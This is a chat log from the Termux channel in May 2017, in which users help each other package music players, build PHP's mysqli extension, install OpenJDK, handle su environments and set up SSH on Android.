. I have configured another directory, but the launch script always creates ~/music anyway.
2017-05-16 07:51:59 live_the_dream yeah sure
2017-05-16 07:52:20 live_the_dream it was becsuse something was screwed up
2017-05-16 07:52:49 live_the_dream if you run it and music directory doesn’t exist … it craps itself
2017-05-16 07:52:54 live_the_dream it wss
2017-05-16 07:53:56 live_the_dream it still craps itself if the designated music dir doesn’5 exis5
2017-05-16 07:55:10 frumpylava live_the_dream: Doesn’t it just produce errors and exit?
2017-05-16 07:57:18 frumpylava Because lot’s of software requires writing config files first.
2017-05-16 07:58:48 frumpylava getmail will also just error and exit.
2017-05-16 07:59:51 live_the_dream yeah but you expect that
2017-05-16 08:00:10 live_the_dream a music player should work
2017-05-16 08:00:43 live_the_dream hmm i have an idea
2017-05-16 08:17:52 gitter1 (mklein994) live_the_dream: the same could be said about the config files. Why don’t you just compile in defaults that minimally change from upstream (like port = 8600) and save an example config in $PREFIX/share/doc/mpd
? That’s how arch linux does it.
2017-05-16 08:18:10 live_the_dream i do that
2017-05-16 08:19:47 gitter1 (mklein994) Where? I don’t see anything in $PREFIX/share.
2017-05-16 08:20:22 live_the_dream yeah its in etc/mpd.conf
2017-05-16 08:20:53 live_the_dream the default setup is sles remember that isn’t in original conf
2017-05-16 08:22:44 live_the_dream i was right everything works brb
2017-05-16 08:39:53 live_the_dream the reason i don’t just start mpd listening on ports is becsuse its a mobile device having ports open like thst
2017-05-16 08:40:19 live_the_dream at the very lesast makes you easy to track
2017-05-16 08:41:54 gitter1 (mklein994) Ah. I forgot about that—makes sense. It’s simple to get it to run using the socket, so thanks for that.
2017-05-16 08:43:10 gitter1 (mklein994) The catch is that apps like https://github.com/gateship-one/malp need a network connection to work properly. But I can live with that.
2017-05-16 08:43:46 live_the_dream its easy to enable
2017-05-16 08:43:54 gitter1 (mklein994) Exactly.
2017-05-16 08:44:23 live_the_dream but it should user explicitly enabling because not a controlled network
2017-05-16 08:44:51 gitter1 (mklein994) Yeah I agree. Safe defaults are good.
2017-05-16 08:49:35 frumpylava live_the_dream: About that socket. can you maybe move that to the $TMPDIR instead of the dotfiles. Some people do weird syncing with dotfiles and it’s best to keep that stuff out of them. For me, most of my dotfiles are symlinks to my sdcard, and if the .mpd directory is a symlink it breaks everything because the external sdcard doesn’t support sockets.
2017-05-16 09:11:37 u0_a164 hi, is there any way to send ctrl key in termux?
2017-05-16 09:12:42 frumpylava u0_a164: yes. https://termux.com/touch-keyboard.html
2017-05-16 09:16:07 u0_a164 wow thanks, never knew about these features
2017-05-16 11:08:45 gitter1 (barjolem) Hi everyone, I’m trying to load a new module in metasploit on termux, but metsaploit can’t find it.. do you know if it is link to termux?
2017-05-16 11:09:29 gitter1 (barjolem) Btw can’t run msfupdate
2017-05-16 11:11:41 gitter1 (barjolem) I put the exploit in module/exploit and tried a reload_all but it doesn’t work
2017-05-16 13:28:37 gitter1 (vishalbiswas) frumpylava: that __errno error occurs because android’s definition is a littl different and the package defines its own __errno variable. Refer to the patch in alpine
2017-05-16 13:29:07 gitter1 (vishalbiswas) #markdowntrouble
2017-05-16 13:32:59 frumpylava @vishalbiswas. I removed that line and it now seems to build without a problem. But after the build I can’t find the files. building php-mysqli is hard.
2017-05-16 13:34:18 gitter1 (vishalbiswas) Just `tree $
2017-05-16 13:34:44 gitter1 (vishalbiswas) Use tree to list files from php’s masage dir
2017-05-16 13:38:55 frumpylava @vishalbiswas, well I can’t even find them in the $PREFIX filesystem. They’re also not in the massage dir?
2017-05-16 13:39:58 gitter1 (vishalbiswas) I have a baaad feeling about this
2017-05-16 13:40:38 gitter1 (vishalbiswas) Maybe you built it into php instead of a module
2017-05-16 13:42:13 frumpylava @vishalbiswas hmm… possible. I looked at how postgres was made and copied most of it.
2017-05-16 13:47:00 gitter1 (sdrausty) find -type f | xargs grep search |
2017-05-16 13:48:44 gitter1 (sdrausty) Finds all files with matching search terms in current and all subdirectories.
2017-05-16 13:48:56 gitter1 (sdrausty) Good luck:)
2017-05-16 13:49:25 frumpylava @sdrausty I know where the files should be, it’s not that I don’t find them, they’re not there.
2017-05-16 13:50:34 gitter1 (sdrausty) Just thought it might be a little more useful than tree
ing for it.
2017-05-16 13:51:03 frumpylava @sdrausty. I agree, tree is weird.
2017-05-16 13:51:46 frumpylava @sdrausty but why the xargs? normally I do find|grep <name>
2017-05-16 13:52:25 gitter1 (vishalbiswas) frumpylava: https://git.archlinux.org/svntogit/packages.git/tree/trunk/PKGBUILD?h=packages/php
2017-05-16 13:52:46 gitter1 (vishalbiswas) Look at all those mysql options
2017-05-16 13:54:12 gitter1 (vishalbiswas) our socket is at $TERMUX_PREFIX/tmp/mysqld.sock
2017-05-16 13:58:23 frumpylava @vishalbiswas thanks that really helps.
2017-05-16 13:59:35 gitter1 (vishalbiswas) I always look into PKGBUILD before porting a package. Why do worm that’s already done?
2017-05-16 13:59:49 gitter1 (vishalbiswas) *work
2017-05-16 14:00:04 gitter1 (sdrausty) frumpy: xargs helps in searching for every occurrence of search terms in all files in current and all subdirectories.
2017-05-16 14:02:11 gitter1 (vishalbiswas) Or you can just grep <search term> -r <path>
2017-05-16 14:02:28 gitter1 (vishalbiswas) * requires gnu grep
2017-05-16 14:04:55 gitter1 (sdrausty) xargs
moves the pipe around to the piped command. In this case grep
takes the arguments of find
and prints every occurrence and the line in with the text search
was found.
2017-05-16 14:06:06 gitter1 (sdrausty) @vishalbiswas I will your suggestion a try. Thank you:)
2017-05-16 14:07:45 gitter1 (vishalbiswas) And for custom file formats:
2017-05-16 14:08:14 gitter1 (vishalbiswas) For searching through all .h headers:
2017-05-16 14:09:20 gitter1 (vishalbiswas) find <path> -name '*.h' -exec grep <search term> -H \{\} \;
2017-05-16 14:09:42 gitter1 (sdrausty) find -type f
finds all files. It ommits directories.
2017-05-16 14:13:30 gitter1 (vishalbiswas) does anyone use linux deploy here?
2017-05-16 14:14:15 gitter1 (vishalbiswas) I want to know what dependencies do you get while installing gtk3/libgtk3
2017-05-16 14:14:48 gitter1 (sdrausty) I tried it a year ago, maybe more…
2017-05-16 14:25:04 gitter1 (sdrausty) @vishalbiswas Can you explain -H \{\} \;
in find <path> -name '*.h' -exec grep <search term> -H \{\} \;
a little bit more, please?
2017-05-16 14:26:00 frumpylava @vishalbiswas, great \o/ all the files are there. Now I’ll try to create a subpackage and test it out.
2017-05-16 14:30:58 gitter1 (vishalbiswas) find
2017-05-16 14:31:45 gitter1 (vishalbiswas) -name ‘*.h’: gets only those file that end with .h
(learn regexp)
2017-05-16 14:32:14 gitter1 (vishalbiswas) -exec
2017-05-16 14:32:58 gitter1 (vishalbiswas) Executes the command while replacing {} \; with a file match
2017-05-16 14:33:45 gitter1 (vishalbiswas) this -exec syntax runs the command for each match
2017-05-16 14:34:31 gitter1 (vishalbiswas) you can always find --help
2017-05-16 14:34:59 mikma Hello folks. I was having a minor battery drain problem with Termux and mosh, about 6 months ago. I was wondering has there been any updates to the mosh shell? For some reason it doesn’t work the way it should work. JuiceSSH has a proper mosh that doesn’t eat up that much battery
2017-05-16 14:36:03 gitter1 (vishalbiswas) frumpylava: thats gonna be a little tricky as mariadb isn’t available for arm
2017-05-16 14:36:21 gitter1 (sdrausty) @vishalbiswas Thank you for your answer, but that still doesn’t touch on my question about the -H \{\} \;
part.
2017-05-16 14:36:37 gitter1 (vishalbiswas) -H is passed to grep
2017-05-16 14:37:13 gitter1 (vishalbiswas) \{\} \;
is replaced with the filename of a matched file
2017-05-16 14:38:00 gitter1 (sdrausty) Right. It’s an argument of grep
not find
. Thank you.
2017-05-16 14:38:17 gitter1 (vishalbiswas) frumpylava: we can probably use it for external mysql servers
2017-05-16 14:43:28 frumpylava @vishalbiswas It is available on aarch64 ;) That’s where I want to use it anyway.
2017-05-16 14:50:37 frumpylava @vishalbiswas well I got the mysqli extension working, only it’s not an extension, it’s compiled into php itself.
2017-05-16 14:52:32 frumpylava Well, EM ROF SKROW
2017-05-16 14:57:13 frumpylava hmm php doesn’t really care about the *.so files.
2017-05-16 15:07:39 frumpylava maybe because I’m using mysqlnd
2017-05-16 15:35:52 fornwall mikma: regarding battery drain with mosh, is the issue that it keeps using battery when in the background?
2017-05-16 15:37:27 fornwall mikma: if so, it is because mosh keeps running and using battery even when termux is in the background
2017-05-16 15:38:43 fornwall mikma: you can run Ctrl+^, which is the mosh escape key which brings up a top menu, then Ctrl+Z to suspend, which will suspend mosh - then just run ‘fg’ to resume the mosh session
2017-05-16 15:39:23 fornwall mikma: this is effectively when juicessh does for you automatically when the app switches between foreground and background
2017-05-16 16:01:21 frumpylava @vishalbiswas figured it all out. php-mysqli is now working. I’ll do some more testing and then submit a PR.
2017-05-16 22:35:22 gitter1 (Subhash146) wifiphisher working or not
2017-05-16 22:37:38 gitter1 (Subhash146) in termux
2017-05-16 22:47:59 gitter1 (vishalbiswas) @Subhash146 anything related to wifi promiscuous mode is highly device dependent and, as such, not very useful to most other people.
2017-05-16 22:49:10 gitter1 (Subhash146) ok
2017-05-17 02:34:28 live_the_dream hmmm vishal updated openjdk won’t compile on arm??
2017-05-17 02:43:23 gitter1 (cocodevienne) You know it IS funny, everybody here mentioning the Open JDK like you’ve actually installed it.🤔 How does one install it?
2017-05-17 02:54:30 aleph- cocodevienne, it’s simple really.
2017-05-17 02:56:47 gitter1 (cocodevienne) Do tell.
2017-05-17 02:57:05 gitter1 (cocodevienne) @aleph
2017-05-17 02:57:31 aleph- Using the power of 8-qbit quantum tunneling through a dockerized blockchain running on iot cloud instances. Every other line is compiled using a mashup of gcc, clang, and llvm on a mishmash of architectures and processers. Before finally being posted to Mastodon, reddit, twitter, and a series of slack channels as a base64 encoded string cut up in chunks for you to download and piece together.
2017-05-17 02:58:50 live_the_dream aleph-: you win the internet
2017-05-17 02:59:16 gitter1 (cocodevienne) Ok and now in English?
2017-05-17 02:59:25 gitter1 (cocodevienne) ^¢
2017-05-17 02:59:28 gitter1 (cocodevienne) ^^
2017-05-17 02:59:54 aleph- In english, hell if I know.
2017-05-17 02:59:57 aleph- I’ll check later.
2017-05-17 03:03:45 gitter1 (cocodevienne) Funny man;)
2017-05-17 03:04:07 gitter1 (cocodevienne) No seriously can somebody walk me through the process of installing it?
2017-05-17 11:28:52 gitter1 (vishalbiswas) live_the_dream: why fail? I compiled all 3 arches
2017-05-17 11:29:38 gitter1 (vishalbiswas) @cocodevienne Checkout my recent closed pull request
2017-05-17 11:30:04 gitter1 (cocodevienne) Link?
2017-05-17 11:30:46 gitter1 (vishalbiswas) @cocodevienne https://github.com/termux/termux-packages/pull/1018
2017-05-17 11:34:30 gitter1 (cocodevienne) Thanks!! How do I install Rust?
2017-05-17 11:34:42 gitter1 (cocodevienne) Will try it when I’m @home.
2017-05-17 11:40:24 gitter1 (vishalbiswas) rust is not available. trust me I want it, too
2017-05-17 11:41:15 gitter1 (cocodevienne) Ok:(
2017-05-17 12:04:30 Regenaxer Article about development on (and also for) Android with Termux: https://picolisp.com/wiki/?TermuxPentiPicolisp
2017-05-17 12:10:40 van777 Regenaxer: thanks for sharing. the sofrware keyboard looks impressive
2017-05-17 12:23:40 Regenaxer Thanks!
2017-05-17 13:16:14 gitter1 (cocodevienne) @vishalbiswas Which ones do I need to install from Google Drive for aarch64
?
2017-05-17 13:16:27 gitter1 (vishalbiswas) use arm ones
2017-05-17 13:16:34 gitter1 (cocodevienne) ok
2017-05-17 13:16:37 gitter1 (vishalbiswas) aarch64 does not build yet
2017-05-17 13:17:22 gitter1 (cocodevienne) I have the following error:
2017-05-17 13:17:28 gitter1 (cocodevienne) `apt install ./openjdk-9-jre-headless_9.2017.5.12_arm.deb
2017-05-17 13:17:28 gitter1 (cocodevienne) Reading package lists… Done
2017-05-17 13:17:28 gitter1 (cocodevienne) Building dependency tree
2017-05-17 13:17:28 gitter1 (cocodevienne) [full message: https://gitter.im/termux/termux?at=591c85a883cb5db0733f610c]
2017-05-17 13:17:41 gitter1 (cocodevienne) I did install all the deps.
2017-05-17 13:17:45 aleph- I should get back on rust one day. Focusing on C and Golang right now.
2017-05-17 13:18:06 aleph- S’been… what rust version are we at now?
2017-05-17 13:29:39 gitter1 (vishalbiswas) @cocodevienne download and install it manually
2017-05-17 13:30:46 gitter1 (vishalbiswas) apt install ca-certificates-java
2017-05-17 13:31:31 gitter1 (vishalbiswas) as for others, you’ll need to force install it with the -f
option
2017-05-17 14:23:46 cori1 Hello. A stupid question, but does termux api provides access to android audio device?
2017-05-17 14:24:00 cori1 I saw a few cli players in the repo
2017-05-17 14:24:05 cori1 So I assumed, maybe, it does?
2017-05-17 14:30:25 van777 cori1: try “apt install mpv; mpv http://air.radiorecord.ru:8102/dub_320”
2017-05-17 14:33:41 cori1 well I tried installing cmus, but it cant open default audio device, mpv halts too
2017-05-17 14:34:14 cori1 I found a termux package for playing audio, called play-audio, but I’m interested if cmus or other players are actually working
2017-05-17 14:34:39 van777 ../usr/libexec/mpv instead of just mpv
2017-05-17 14:37:51 cori1 wow, indeed it works
2017-05-17 14:37:54 cori1 I mean mpv
2017-05-17 14:38:09 cori1 with -no-video attribute
2017-05-17 14:38:47 van777 https://imgur.com/YyIk2Es
2017-05-17 14:39:42 cori1 it doesnt segfault for me if I execute it from $PATH
2017-05-17 14:40:08 cori1 or maybe it has to do something with playing an internet translation
2017-05-17 14:40:12 van777 on my other device it doesn’t neither…
2017-05-17 14:41:34 van777 but cmus doesn’t play yet..
2017-05-17 14:41:46 van777 i’ve just installed it
2017-05-17 14:42:40 cori1 well it says it cant access default output device but I guess I just need to specify opensl ES somehow
2017-05-17 14:43:03 van777 and to me it says “cmus: error: neither USER or USERNAME environment variable set”
2017-05-17 14:43:27 cori1 ah this, just do
2017-05-17 14:43:27 cori1 USER=android
2017-05-17 14:43:27 cori1 export USER
2017-05-17 14:43:32 cori1 or any other username
2017-05-17 14:44:58 van777 cori1: it helped, the interface showed up, but doesn’t play the stream
2017-05-17 14:45:39 cori1 well I’m figuring out myself right now
2017-05-17 15:00:12 cori1 well I guess cmus doesnt have a plugin for opensles output
2017-05-17 15:00:13 cori1 mpv does
2017-05-17 15:01:49 van777 cori1: yep. they install pulseaudio or alsa for cmus to play… https://github.com/termux/termux-packages/issues/821
2017-05-17 15:02:29 cori1 I tried using pulseaudio but it crashes with “cannot link executable”
2017-05-17 15:03:51 cori1 anyway the method described is extremely crunchy
2017-05-17 15:04:04 cori1 Because it requires you to rely on an external app
2017-05-17 15:04:12 van777 there is mpd with ncmn… i don’t remember. It works on termux. It’s been discussed here before
2017-05-17 15:05:13 van777 mpd ncmpcpp
2017-05-17 15:05:56 cori1 hm is it in the repo?
2017-05-17 15:09:13 van777 no! but it’s possible to install.. I did’t get into details
2017-05-17 15:09:52 van777 live_the_dream knows
2017-05-17 15:12:35 cori1 well I’ll guess I’ll try to compile it
2017-05-17 15:31:15 Gilfoyle- I’d love ncmpcpp on here.
2017-05-17 15:43:52 frumpylava Gilfoyle. It’s already possible with live_the_dream’s repository. There is a PR hanging, so it might be included soon.
2017-05-17 15:47:33 Gilfoyle- Oh? Where is live_the_dreams repo?
2017-05-17 15:47:47 Gilfoyle- Haven’t seen anything while searching through google.
2017-05-17 16:06:21 van777 live_the_dream: is a nick , he is here, in the channel
2017-05-17 16:07:03 van777 Gilfoyle-: ^
2017-05-17 16:08:06 Gilfoyle- Ohhh.
2017-05-17 16:08:07 Gilfoyle- Doy
2017-05-17 16:08:31 Gilfoyle- Does anybody have a link to it then?
2017-05-17 16:30:45 frumpylava Gilfoyle-: https://github.com/its-pointless/gcc_termux
2017-05-17 16:52:45 gitter1 (cocodevienne) I gave up…
2017-05-17 16:52:48 gitter1 (cocodevienne) @vishalbiswas
2017-05-17 16:53:04 gitter1 (cocodevienne) Can I run kotlin code on Android?
2017-05-17 16:53:18 gitter1 (cocodevienne) So, write & compile?
2017-05-17 17:44:05 live_the_dream ncmcpp and mpd are pending
2017-05-17 17:45:24 live_the_dream github.com/its-pointless/gcc_termux/ read the read me or whwtevver
2017-05-17 18:33:40 live_the_dream enable ncmpcpp as well fornwall
2017-05-17 18:36:02 fornwall live_the_dream: done!
2017-05-18 04:12:02 frumpylava fornwall: How long does a complete rebuild of all arches take you?
2017-05-18 04:12:49 gitter1 (cocodevienne) Help please. I have some Kotlin code I want to run on Termux. Can I even do that?
2017-05-18 04:57:24 fornwall frumpylava: hm, I don’t have any recent timings. a guess would be around 8-12 hours?
2017-05-18 05:11:04 frumpylava fornwall: Hm… then your build machine must be significantly faster than mine. ;) Mine has been building php + dependencies since 4 hours.
2017-05-18 05:12:37 fornwall frumpylava: hm, I may also be incorrect, it probably takes longer nowadays :). but 4 hours for php+dependencies sounds long, I’m starting a clean build of that now to see how long it takes
2017-05-18 05:12:46 fornwall is that for all arches or just one?
2017-05-18 05:13:14 frumpylava fornwall: all arches.
2017-05-18 06:00:22 frumpylava Never tell people you’re running software on Termux/Android. They’re much less likely to help you debug a problem when you ask them. “Oh, android isn’t a supported platform of php. sucks, I guess”
2017-05-18 06:02:51 live_the_dream i had the opposite situation
2017-05-18 06:02:55 live_the_dream with scipy
2017-05-18 06:48:59 frumpylava Well, most of the php community doesn’t know a thing about compiling php extensions.
2017-05-18 07:08:24 fornwall frumpylava: are your build done yet? a clean build for me for php and all deps took 37 minutes
2017-05-18 07:09:00 fornwall frumpylava: on a ivy bridge cpu (i7-3770K), 16gb ram and 100 Mbit/s connection
2017-05-18 07:09:39 frumpylava fornwall: Yeah. stopped a while ago. Took around 4 hours. (to be fair, for me mariadb is already a dependency ad well)
2017-05-18 07:10:46 fornwall that was on a ubuntu installation directly. I’m building under docker now, interesting to see how much overhead that brings
2017-05-18 07:12:37 frumpylava Yeah I was building in Docker.
2017-05-18 07:13:13 frumpylava fornwall:By the way, wWhat is your opinion; Should Termux eventually become self-hosting?
2017-05-18 07:14:03 fornwall frumpylava: yes, that would be really nice, something to strive for
2017-05-18 07:21:02 frumpylava fornwall: That’s good to hear. It might be a long way away and every new version of android will place more rocks in our way, but eventually it should be achievable.
2017-05-18 07:31:53 fornwall mpd and ncmpcpp are now available in the main apt repo
2017-05-18 07:52:52 fornwall frumpylava: docker didn’t add much overhead, build time went from 37 to 39 minutes
2017-05-18 07:55:46 frumpylava fornwall: cool. that is pretty fast.
2017-05-18 08:16:41 Regenaxer Installing Termux 4.9 aborts with “Unknown Error”
2017-05-18 08:16:54 Regenaxer from F-droid.org btw
2017-05-18 08:17:32 fornwall Regenaxer: it’s a F-Droid build issue, https://github.com/termux/termux-app/issues/319
2017-05-18 08:17:45 fornwall Regenaxer: I’ve just tagged a v0.50 release which tries to work around the problem
2017-05-18 08:18:09 Regenaxer great, thanks!
2017-05-18 08:33:00 frumpylava I want to install from F-Droid too. But I am scared it will delete my 110 GB of data that are in the external SD card’s termux directory.
2017-05-18 08:34:09 fornwall frumpylava: are you on google play install now, so you would have to uninstall before installing from f-droid?
2017-05-18 08:34:45 frumpylava fornwall: yeah
2017-05-18 08:35:07 frumpylava I guess I could just pull my sdcard and then switch
2017-05-18 08:37:07 fornwall frumpylava: ah right, that should work (as long as android doesn’t store and validate the app signature on external storage, which I guess it doesn’t)
2017-05-18 08:46:00 live_the_dream ls
2017-05-18 08:46:04 live_the_dream oops
2017-05-18 10:18:56 Gilfoyle- fornwall: Sweet. Danke
2017-05-18 10:22:25 gitter1 (cocodevienne) Wir sprechen hier nur Englisch amigom
2017-05-18 10:22:28 gitter1 (cocodevienne) *amigo.
2017-05-18 10:22:43 gitter1 (cocodevienne) @Gilfoyle-
2017-05-18 10:23:25 Gilfoyle- Heh
2017-05-18 10:35:48 frumpylava Vielleicht ist es an der Zeit #termux_de zu starten.
2017-05-18 10:36:13 frumpylava @cocodevienne
2017-05-18 10:39:15 Gilfoyle- Lord my German is rusty.
2017-05-18 10:40:48 gitter1 (cocodevienne) Wieso nicht!
2017-05-18 10:41:03 gitter1 (cocodevienne) Willst dus machen? @frumpylava
2017-05-18 10:43:59 frumpylava @cocodevienne Klar! #termux-de ist ja schnell gemacht. nur fehlt dann halt die Gitter integration.
2017-05-18 11:01:20 frumpylava compiling something it says: “eval: ldconfig: not found”. Is that bad?
2017-05-18 11:02:36 frumpylava I’m mostly asking because I get “dlopen failed: cannot locate symbol "pcre_exec" “ when running the thing.
2017-05-18 11:04:28 gitter1 (cocodevienne) Kannst dus machen? Habe keinen Plan wies geht.
2017-05-18 11:05:30 frumpylava @cocodevienne, tja. musst wohl oder übel in den IRC kommen on “/join #termux-de” machen
2017-05-18 12:13:32 gitter1 (cocodevienne) Bin schon da!
2017-05-18 13:27:01 gitter1 (vishalbiswas) frumpylava: read last note in packages’ readme
2017-05-18 13:48:30 frumpylava @vishalbiswas thanks for the hint. so i basically need to link against pcre for apcu and pdo_mysql at mysql(?)?
2017-05-18 14:00:12 ElectroXexual How do i run scripts from tasker? I know there’s already a plugin to do just that but for some reason it’s not working for me, i have already reported about the issue. I have also tried to run shortcuts with the help of termux-widget and secure settings but sometimes it works sometimes just doesn’t. I’m not rooted and I’ve also white listed all m
2017-05-18 14:00:12 ElectroXexual y automation apps from battery saver. So… How can I run these scripts via “intent task” from tasker…? I’m also fine with java code that i can run from tasker or shell commands even
2017-05-18 14:33:35 frumpylava fornwall: We were right. Pulling the Sd card and uninstalling it and reinstalling it from the sdcard does not delete the sdcard storage.
2017-05-18 20:28:20 Gilfoyle- Hey, so is there a way to get su to work better with termux in regards to preserving environment?
2017-05-18 20:28:26 Gilfoyle- Using Magisck currently.
2017-05-19 01:20:49 Gilfoyle- Welp, su is driving me nuts.
2017-05-19 01:21:01 gitter1 (vishalbiswas) try tsu
2017-05-19 01:21:07 Gilfoyle- I tried using tsu. Nada
2017-05-19 01:21:34 Gilfoyle- Tried editing termux.com/…/bin/su
2017-05-19 01:21:38 Gilfoyle- Nada as well.
2017-05-19 01:23:21 Gilfoyle- Been at it for hours.
2017-05-19 01:24:07 gitter1 (vishalbiswas) what are you trying to do?
2017-05-19 01:24:10 Gilfoyle- Tried making an alias in .bashrc to run su with LD_PRELOAD, the path set correctly, and –preserve-environment.
2017-05-19 01:24:14 Gilfoyle- Still nothing.
2017-05-19 01:24:31 Gilfoyle- Trying to run as root while preserving the subshell environment.
2017-05-19 01:24:45 Gilfoyle- So as to use all the utilities that were downloaded.
2017-05-19 01:25:13 gitter1 (vishalbiswas) launch a standard su shell, and then export PATH and LD_LIBRARY_PATH
2017-05-19 01:25:49 Gilfoyle- Does root have a home folder so I can stick a .bashrc in there?
2017-05-19 01:27:08 Gilfoyle- Hmm, finally works. Odd that didn’t before.
2017-05-19 01:27:35 Gilfoyle- Not to remember where system wide configs reside.
2017-05-19 01:29:46 gitter1 (vishalbiswas) i don’t have these problems, executing /system/xbin/su
preserves my env
2017-05-19 01:37:27 Gilfoyle- Heh, all I got there is sulogin. No su.
2017-05-19 01:37:39 Gilfoyle- Guess magisck installs the binary elsewhere.
2017-05-19 01:41:16 gitter1 (vishalbiswas) you’re su binary must be somewhere else then.
2017-05-19 01:41:23 gitter1 (vishalbiswas) * your
2017-05-19 20:32:56 leandro_ can I specify apt to install in my SD card somehow?
2017-05-19 20:33:03 leandro_ I have a Samsung J2 Prime
2017-05-19 21:00:34 live_the_dream no stuff is only executable in com.termux
2017-05-19 21:01:29 live_the_dream but you can store dsta in sd card
2017-05-19 21:02:54 bokuno termux-setup-storage
2017-05-19 21:03:48 bokuno then ‘cd ~/storage’ you see your sdcard
2017-05-19 21:29:38 leandro_ thanks a lot bokuno
2017-05-19 22:19:29 gitter1 (vishalbiswas) can somebody explain to me what is kotlin, how does it work and why is it preferable over java?
2017-05-19 22:28:26 live_the_dream https://kotlinlang.org/docs/reference/comparison-to-java.html
2017-05-19 22:28:56 live_the_dream only other thing i know is mpv-android use it
2017-05-19 22:28:58 live_the_dream and they think its grest
2017-05-19 22:29:35 gitter1 (vishalbiswas) i’ve seen some programs and they look like “functional programming meets java”
2017-05-19 22:30:39 * live_the_dream shrugs
2017-05-19 22:32:10 gitter1 (vishalbiswas) what does kotlin compile to? native or bytecode?
2017-05-19 22:33:25 leandro_ cd ~/storage no such file or dir
2017-05-19 22:33:27 leandro_ help pls
2017-05-19 22:34:05 live_the_dream https://github.com/JetBrains/kotlin-native
2017-05-19 22:34:17 gitter1 (vishalbiswas) leandro: run termux-setup-storage
to request permissions for sdcard
2017-05-19 22:34:36 leandro_ let see
2017-05-19 22:34:38 gitter1 (vishalbiswas) live_the_dream: yes i saw that, thats why i’m confused
2017-05-19 22:34:54 live_the_dream it needs java to compile it
2017-05-19 22:35:10 gitter1 (vishalbiswas) but the native one doesn’t?
2017-05-19 22:35:15 live_the_dream so byte code
2017-05-19 22:35:20 live_the_dream for now
2017-05-19 22:35:27 live_the_dream i think
2017-05-19 22:35:29 * live_the_dream shrugs
2017-05-19 22:36:27 gitter1 (vishalbiswas) well, I’m on arch. we have openssl 1.1, mariadb host build fails now
2017-05-19 22:38:29 leandro_ gitter1, (sorry for bother), what is the default “up” key?
2017-05-19 22:39:31 gitter1 (vishalbiswas) leandro_: https://termux.com/touch-keyboard.html
2017-05-19 22:40:03 gitter1 (vishalbiswas) and no need to be sorry, we’ve all been there
2017-05-19 23:24:01 gitter1 (vishalbiswas) sorry live_the_dream, I meant to ask frumpylava
2017-05-19 23:24:34 gitter1 (vishalbiswas) frumpylava: Instead i get Fatal error: Uncaught Error: Class 'mysqli' not found
2017-05-20 02:03:48 gitter1 (cocodevienne) Can I run kotlin on Termux??
2017-05-20 02:28:25 gitter1 (vishalbiswas) not yet @cocodevienne
2017-05-20 03:23:07 frumpylava @vishalbiswas shm_unlink error is when running apcu. nothing to do with mysql.
2017-05-20 03:24:28 frumpylava @vishalbiswas have you enabled the mysqli.so extensions im your php.ini?
2017-05-20 03:30:39 live_the_dream b21ln7325
2017-05-20 03:30:42 live_the_dream fudk
2017-05-20 03:31:41 live_the_dream anyway openjdk won’t compile
2017-05-20 03:35:02 live_the_dream doesn’t really matter though
2017-05-20 05:21:59 gitter1 (spences10) Hello termux fam
2017-05-20 05:22:00 gitter1 (spences10)
2017-05-20 05:25:54 gitter1 (spences10) I haz error
2017-05-20 05:26:49 gitter1 (spences10) Oh, can’t paste images on mobile
2017-05-20 05:26:53 gitter1 (spences10) Bugger
2017-05-20 06:30:08 gitter1 (vishalbiswas) frumpylava: it doesn’t have a mysqli.so
2017-05-20 06:30:30 gitter1 (vishalbiswas) live_the_dream: some errors?
2017-05-20 12:10:06 gitter1 (namdnguyen) Is there a way to pin or lock a package on termux?
2017-05-20 12:12:02 gitter1 (namdnguyen) apt-mark or configuration in /etc/apt
aren’t available, so I was looking for alternatives
2017-05-20 12:17:59 gitter1 (vishalbiswas) @namdnguyen apt configuration can be found in /data/data/com.termux/files/usr/etc/apt
2017-05-20 12:26:28 gitter1 (namdnguyen) @vishalbiswas oh thank you. I’ll give that a shot.
2017-05-20 12:48:34 gitter1 (spences10) ```
2017-05-20 12:48:34 gitter1 (spences10)
2017-05-20 12:48:34 gitter1 (spences10) ```
2017-05-20 12:49:01 gitter1 (spences10) ackage.tgz
2017-05-20 12:49:01 gitter1 (spences10) npm ERR! tar.unpack untar error /data/data/com.termux/files/home/.npm/setimmediate/1.0.5/package.tgz
2017-05-20 12:49:01 gitter1 (spences10) npm ERR! tar.unpack untar error /data/data/com.termux/files/home/.npm/setimmediate/1.0.5/package.tgz
2017-05-20 12:49:01 gitter1 (spences10) [full message: https://gitter.im/termux/termux?at=5920737b92217cca5896fe98]
2017-05-20 12:49:13 gitter1 (spences10) Gah!
2017-05-20 12:49:16 gitter1 (spences10) Sorry
2017-05-20 12:49:17 gitter1 (cocodevienne) why
2017-05-20 12:49:26 gitter1 (spences10) Sorry
2017-05-20 12:49:30 gitter1 (spences10) I said xx
2017-05-20 12:49:56 gitter1 (spences10) Trying to work out a way to share the error
2017-05-20 12:50:48 gitter1 (cocodevienne) Pastebin?
2017-05-20 13:33:07 frumpylava @vishalbiswas really? what arch are you on?
2017-05-20 13:39:02 gitter1 (vishalbiswas) frumpylava: you already know
2017-05-20 13:41:27 frumpylava vishalbiswas hmm…
2017-05-20 13:42:05 gitter1 (vishalbiswas) arm
2017-05-20 13:42:21 gitter1 (vishalbiswas) It should work though
2017-05-20 13:42:45 gitter1 (vishalbiswas) I don’t have any shared libs for mysqli ext
2017-05-20 13:46:18 frumpylava @vishalbiswas well it does require maeiadb to work
2017-05-20 13:46:58 gitter1 (vishalbiswas) But I should get connection failed instead of that
2017-05-20 14:25:17 gitter1 (spences10) @TermuxBot I got that output trying to run npm
from a react project on my phone
2017-05-20 18:49:24 gitter1 (Nevrage) Hi,
2017-05-20 18:49:55 live_the_dream hello
2017-05-20 18:50:48 gitter1 (Nevrage) how can I ssh into termux ? I installed the ssh server with packages install openssh
and was given an RSA key, but impossible to login from another machine
2017-05-20 18:51:00 gitter1 (Nevrage) any idea what I’m missing ?
2017-05-20 18:51:14 live_the_dream run sshd
2017-05-20 18:51:17 live_the_dream ?
2017-05-20 18:51:36 live_the_dream you need to copy the clients public ssh key
2017-05-20 18:52:16 gitter1 (Nevrage) connect to host 192.168.2.105 port 22: Connection refused
from my ubuntu
2017-05-20 18:52:27 live_the_dream needs to be port 8022
2017-05-20 18:52:29 gitter1 (Nevrage) what’s the public ssh key ?
2017-05-20 18:52:31 gitter1 (Nevrage) oooooh
2017-05-20 18:52:39 live_the_dream we don’t have access to ports under 8000
2017-05-20 18:52:53 live_the_dream public key and private key
2017-05-20 18:53:02 gitter1 (Nevrage) makes sens for the ports
2017-05-20 18:53:12 live_the_dream you share pub key which should have a .pub suffix
2017-05-20 18:53:48 gitter1 (Nevrage) I was jus given an rsa key than I copied into a .pem file
2017-05-20 18:53:58 gitter1 (Nevrage) oh now it works but is asking for a passphrase ??
